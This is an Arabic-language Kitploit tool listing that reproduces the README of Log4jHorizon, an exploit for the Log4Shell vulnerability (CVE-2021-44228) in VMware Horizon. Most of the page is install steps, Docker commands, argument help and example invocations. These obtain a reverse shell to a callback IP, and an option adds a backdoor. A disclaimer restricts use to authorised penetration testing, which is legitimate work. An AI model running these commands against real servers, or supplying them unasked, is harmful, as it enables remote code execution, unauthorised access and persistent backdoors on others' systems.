Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4jHorizon — استغلال CVE-2021-44228 في VMWare Horizon لتنفيذ الأوامر عن بُعد والمزيد. | Kitploit
أدوات/GitHubGitHub/puzzlepeaches/log4jhorizon
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

استغلال CVE-2021-44228 في VMWare Horizon لتنفيذ الأوامر عن بُعد والمزيد.

عرض المستودع
12013منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4jHorizon

استغلال CVE-2021-44228 في VMWare Horizon لتنفيذ الأوامر عن بُعد والمزيد.

  • عبور أفق Log4j - ثغرة بلا عودة

الكود وملف README.md هذه المرة مشتتان بعض الشيء. تحديثات قادمة!

لماذا؟

أدلة إثبات المفهوم لهذه الثغرة متناثرة ويجب تنفيذها يدويًا. هذا المستودع يؤتمت عملية الاستغلال. راجع منشور المدونة أعلاه للحصول على إرشادات حول مرحلة ما بعد الاستغلال.

التثبيت

يمكن استخدام هذا المستودع يدويًا أو عبر Docker.

التثبيت اليدوي

لتنزيل وتشغيل أداة الاستغلال يدويًا، نفّذ الخطوات التالية. أولاً، تأكد من تثبيت Java و Maven على جهاز المهاجم. للقيام بذلك باستخدام apt على أنظمة التشغيل المبنية على Debian، نفّذ الأمر التالي:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

استنسخ مستودع GitHub وثبّت جميع متطلبات Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

من جذر مستودع Log4jHorizon، قم بتجميع مشروع Rogue-Jndi باستخدام الأمر التالي:

root@kitploit:~
mvn package -f utils/rogue-jndi/

التثبيت عبر Docker

أولاً، تأكد من تثبيت Docker على جهاز الهجوم. (لن أرشدك خلال القيام بذلك)

بعد ذلك، نفّذ الأمر التالي لاستنساخ المستودع وبناء صورة Docker التي سنستخدمها.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

لتشغيل الحاوية، نفّذ أمرًا مشابهًا للتالي مع إضافة وسائط سطر الأوامر الخاصة بك. لاحظ أن الحاوية لن تلتقط قشرة عكسية. تحتاج إلى إنشاء مستمع ncat في جلسة طرفية منفصلة:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

أمثلة

احصل على قشرة عكسية باستخدام الأداة المثبتة على نظامك المحلي:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

إخلاء مسؤولية

صُممت هذه الأداة للاستخدام أثناء اختبار الاختراق؛ استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام لهذا البرنامج.

تنزيل الأداة